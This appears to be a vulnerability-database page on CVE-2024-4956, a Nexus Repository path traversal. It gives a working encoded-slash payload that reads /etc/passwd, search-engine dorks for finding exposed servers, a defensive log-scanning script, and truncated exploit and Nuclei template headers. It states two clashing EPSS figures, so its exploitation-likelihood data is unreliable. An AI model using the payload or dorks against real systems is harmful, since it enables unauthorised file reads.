CVE-2024-4956
Published 2024-05-16
CVE-2024-4956: Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
Priority P2 · 70 · high · CVSS 3.1: 7.5
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 18.25% (96.9th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonatype | nexus_repository | 3.0.0 – 3.68.0 | — |
Detection & IOCs (extracted from sources)
- url: `{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd`
- yara: `regex('root:.*:0:0:', body) AND contains(header, "application/octet-stream") AND status_code == 200`
- Successful exploitation returns HTTP 200 with Content-Type header 'application/octet-stream' and body matching regex 'root:.*:0:0:' (contents of /etc/passwd).
- The exploit fingerprints vulnerable Nexus instances via Google Dork: header="Server: Nexus/3.53.0-01 (OSS)" and FOFA queries on title="Nexus Repository Manager".
- FOFA queries used to identify exposed Nexus instances: title="Nexus Repository Manager" or title="nexus repository manager".
- The exploit filters out false positives by checking that the response does NOT contain the string 'nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false', 'Not Found', or '400 Bad Request', but DOES contain 'root'.
- Attack is unauthenticated and uses URL-encoded path traversal sequences (multiple leading %2F slashes followed by ..%2F sequences) in a plain HTTP GET request; no special headers or authentication required.
- The vulnerability is fixed in Sonatype Nexus Repository 3 version 3.68.1 and later; instances running versions prior to 3.68.1 are affected.
- The exploit was specifically tested against version 3.53.0-01 on Ubuntu 20.04, but the vulnerability affects the broader Nexus Repository 3 product line below 3.68.1.
- EPSS score of 0.94028 (99.9th percentile) indicates extremely high likelihood of exploitation in the wild; treat as actively exploited.
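Added example (not from the original page or any source it cites): a check for web access logs built on the request shape listed above, flagging paths that use encoded slashes and decode to a run of slashes followed by `../` segments. The combined log format, the sample lines, the IP addresses and all function names are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Combined-log-format line: client ip, request target, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)
ENCODED_SLASH = re.compile(r'%(?:25)*2f', re.IGNORECASE)  # %2F, %252F, ...
# After decoding: a run of 2+ slashes directly followed by "../" segments.
TRAVERSAL = re.compile(r'/{2,}(?:\.\./)+')
# Constructed sample lines (not captured traffic); PROBE has the shape listed above.
PROBE = '/' + '%2F' * 14 + '..%2F' * 7 + 'etc%2Fpasswd'
SAMPLE_LOG = [
    f'203.0.113.7 - - [22/Sep/2024:10:01:02 +0000] "GET {PROBE} HTTP/1.1" 200 1843',
    f'203.0.113.8 - - [22/Sep/2024:10:01:09 +0000] "GET {PROBE} HTTP/1.1" 404 0',
    '198.51.100.4 - - [22/Sep/2024:10:02:00 +0000] "GET /repository/maven-public/a/a.pom HTTP/1.1" 200 912',
    '198.51.100.9 - - [22/Sep/2024:10:03:00 +0000] "GET /repository/npm/@scope%2Fpkg HTTP/1.1" 200 5120',
]


def decode_fully(target, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def is_traversal_probe(target):
    """True when the raw path has encoded slashes and decodes to //.../../ form."""
    path = target.split('?', 1)[0]
    if not ENCODED_SLASH.search(path):
        return False
    return bool(TRAVERSAL.search(decode_fully(path)))


def scan_access_log(lines):
    """One finding per matching request; status 200 marks a possible file read."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_traversal_probe(m['target']):
            continue
        findings.append({'ip': m['ip'], 'target': m['target'],
                         'status': int(m['status']), 'possible_read': m['status'] == '200'})
    return findings
```

A 200 on a flagged request only marks a candidate; the response-side indicators listed above (octet-stream content type, body matching `root:.*:0:0:`) are what confirm a read.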
No detection rules found.
Exploit-DB
Sonatype Nexus Repository 3.53.0-01 - Path Traversal
exploitdb·2025-03-28·CVSS 7.5
CVE-2024-4956 [HIGH] Sonatype Nexus Repository 3.53.0-01 - Path Traversal
---
```python
# Exploit Title: Sonatype Nexus Repository 3.53.0-01 - Path Traversal
# Google Dork: header="Server: Nexus/3.53.0-01 (OSS)"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-4956
# Vendor Homepage: https://www.sonatype.com/nexus-repository
# Software Link: https://www.sonatype.com/nexus-repository
# Version: 3.53.0-01
# Tested on: Ubuntu 20.04
# CVE: CVE-2024-4956
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_co
```
Exploit-DB
Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
exploitdb·2025-03-28·CVSS 9.8
CVE-2024-23692 [CRITICAL] Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
---
```python
# Exploit Title: Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
# Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-23692
# Vendor Homepage: http://rejetto.com/hfs/
# Software Link: http://rejetto.com/hfs/
# Version: 2.3m
# Tested on: Windows 10
# CVE: CVE-2024-23692
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)
```
Nuclei
Sonatype Nexus Repository Manager 3 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2024-4956 [HIGH] Sonatype Nexus Repository Manager 3 - Local File Inclusion
Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
Template:
```yaml
id: CVE-2024-4956
info:
  name: Sonatype Nexus Repository Manager 3 - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
  impact: |
    Unauthenticated attackers can read arbitrary system files via path traversal in Sonatype Nexus Repository.
  remediation: |
    Update Sonatype Nexus Repository 3 to version 3.68.1 or later.
  reference:
    - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg
    - https://nvd.nist.gov/vuln/detail/CVE-20
```
No writeups or analysis indexed.
Published: 2024-05-16